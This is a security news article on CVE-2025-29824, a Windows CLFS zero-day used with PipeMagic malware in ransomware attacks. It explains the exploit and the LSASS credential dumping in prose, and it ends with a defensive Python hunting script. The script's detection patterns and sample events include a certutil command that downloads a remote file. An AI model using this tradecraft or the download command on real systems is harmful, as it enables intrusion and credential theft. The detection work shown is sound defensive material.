Microsoft has disclosed that a recently patched vulnerability in the Windows Common Log File System (CLFS) kernel driver was exploited as a zero-day in targeted ransomware attacks against a small number of organizations. The flaw, tracked as CVE-2025-29824 and fixed in the April 2025 Patch Tuesday release, is an elevation-of-privilege bug that the attackers used to obtain SYSTEM-level access after gaining a foothold.

The affected organizations span multiple sectors: information technology and real estate in the United States, the financial sector in Venezuela, a software company in Spain, and retail businesses in Saudi Arabia. Microsoft tracks the actor behind the activity as Storm-2460 and observed it using the PipeMagic malware to stage both the exploit and the ransomware payloads.

The initial access vector has not been determined. In the observed intrusions, however, the attackers used the built-in certutil utility to download malicious files from a legitimate third-party website that had been compromised to host them. The downloaded file was an MSBuild project file carrying an encrypted payload; once decrypted, it loads the PipeMagic trojan, a backdoor that has been active in the wild since 2022.

CVE-2025-29824 is the second zero-day delivered through PipeMagic this year. The earlier case involved CVE-2025-24983, a Windows kernel privilege-escalation vulnerability that Microsoft patched in March 2025, shortly before the current activity. Earlier PipeMagic campaigns were also linked to Nokoyawa ransomware operations in 2023, which exploited a different CLFS zero-day in the same way.

Kaspersky, which first documented PipeMagic, describes it as a modular backdoor that is launched through MSBuild scripts, and Microsoft observed that targeted machines were compromised with it before the CLFS exploit was run. Microsoft also confirmed that Windows 11, version 24H2, is not affected by the observed exploitation: the exploit depends on a system information class that, on 24H2, can only be queried by accounts holding SeDebugPrivilege, which only administrator-level users can obtain. The underlying vulnerability is still present on 24H2, so the April update should be applied there as well; the mitigation only breaks this particular exploit chain.

The Microsoft Threat Intelligence team described the exploit's mechanics: it triggers a memory-corruption bug in the CLFS kernel driver and uses the resulting write to call the RtlSetAllBits API against the exploit process's token, overwriting its privilege bitmap with all ones (0xFFFFFFFF). With every privilege enabled, the process can inject code into a SYSTEM process, winlogon.exe in the observed activity, and run from there.

After escalating, the attackers dumped the memory of the Local Security Authority Subsystem Service (LSASS) to harvest credentials, then deployed a ransomware payload that encrypts files and appends a random extension. Microsoft did not recover a ransomware sample, but the ransom note dropped after encryption contained a TOR domain associated with the RansomEXX ransomware group.
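The three behaviours described above (certutil fetching a remote file, MSBuild executing a project from a staging location, and a non-security process reading LSASS memory) are all visible in ordinary process-creation and process-access telemetry. As an added example, not code from the article or from Microsoft or Kaspersky, the following Python script runs simple hunting rules over a handful of constructed Sysmon-style events. The staging-directory list, the LSASS reader allowlist, and every path and hostname in the sample events are assumptions for illustration and should be tuned to the environment being monitored.

```python
"""Hunting rules for the tradecraft in this article, run over constructed sample events.

Assumptions (not from the article): the Sysmon-like event shape below, the list of
user-writable staging directories, and the allowlist of processes expected to read LSASS.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    event_id: int              # Sysmon-style: 1 = ProcessCreate, 10 = ProcessAccess
    image: str                 # full path of the acting process
    command_line: str = ""
    parent_image: str = ""
    target_image: str = ""     # event 10 only: the process being opened
    granted_access: int = 0    # event 10 only: access mask requested on the target


# -urlcache and -verifyctl are the well-known certutil switches abused to fetch remote files.
CERTUTIL_FETCH = re.compile(r"\s-(urlcache|verifyctl)\b.*https?://", re.IGNORECASE)

# Assumed heuristic: MSBuild projects launched from these writable, non-developer
# locations are far more likely to be staged payloads than legitimate builds.
SUSPICIOUS_DIRS = (
    "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\users\\public\\", "\\appdata\\local\\temp\\",
)

PROCESS_VM_READ = 0x0010  # the access right a memory dump of LSASS cannot do without

# Assumed allowlist of processes that legitimately open LSASS in most environments.
LSASS_READERS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so rules do not depend on install location."""
    return PureWindowsPath(path).name.lower()


def rule_certutil_download(ev: ProcEvent):
    """Flag certutil.exe invoked with a download switch and an HTTP(S) URL."""
    if ev.event_id == 1 and basename(ev.image) == "certutil.exe" and CERTUTIL_FETCH.search(ev.command_line):
        return "certutil used to fetch remote content"
    return None


def rule_msbuild_from_writable_dir(ev: ProcEvent):
    """Flag msbuild.exe whose command line references a project under a staging directory."""
    if ev.event_id != 1 or basename(ev.image) != "msbuild.exe":
        return None
    if any(d in ev.command_line.lower() for d in SUSPICIOUS_DIRS):
        return "MSBuild run against a project in a user-writable staging directory"
    return None


def rule_lsass_read(ev: ProcEvent):
    """Flag a process outside the allowlist opening lsass.exe with PROCESS_VM_READ."""
    if ev.event_id != 10 or basename(ev.target_image) != "lsass.exe":
        return None
    if ev.granted_access & PROCESS_VM_READ and basename(ev.image) not in LSASS_READERS_ALLOWLIST:
        return f"lsass.exe opened with PROCESS_VM_READ (access mask 0x{ev.granted_access:x})"
    return None


RULES = (rule_certutil_download, rule_msbuild_from_writable_dir, rule_lsass_read)


def hunt(events):
    """Return (rule name, acting process, reason) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((rule.__name__, basename(ev.image), reason))
    return hits


# Constructed sample telemetry; paths, file names and hosts are made up for the example.
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -f http://example.invalid/files/tc.txt C:\ProgramData\tc.txt",
              parent_image=r"C:\Windows\System32\cmd.exe"),
    ProcEvent(1, r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -hashfile C:\Downloads\setup.exe SHA256"),          # benign use
    ProcEvent(1, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\ProgramData\tc\project.xml",
              parent_image=r"C:\Windows\System32\cmd.exe"),
    ProcEvent(1, r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Build", parent_image="devenv.exe"),  # real build
    ProcEvent(10, r"C:\Users\Public\svc.exe",
              target_image=r"C:\Windows\System32\lsass.exe", granted_access=0x1FFFFF),
    ProcEvent(10, r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
              target_image=r"C:\Windows\System32\lsass.exe", granted_access=0x1410),  # allowlisted
]


if __name__ == "__main__":
    for rule_name, image, reason in hunt(SAMPLE_EVENTS):
        print(f"{rule_name:32} {image:16} {reason}")
```

Run against the constructed events, the script reports exactly three hits: the certutil download, the MSBuild run from C:\ProgramData, and the unknown binary reading LSASS. The benign certutil hash, the Visual Studio build and the Defender engine pass silently. In production the same three checks map directly onto Sysmon event IDs 1 and 10 (or the equivalent EDR telemetry), and the allowlist is where most tuning effort goes.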

The incident illustrates why ransomware operators prize elevation-of-privilege exploits: they convert the limited foothold that commodity malware provides into privileged access, which is then used to harvest credentials and push the ransomware payload across the rest of the network.
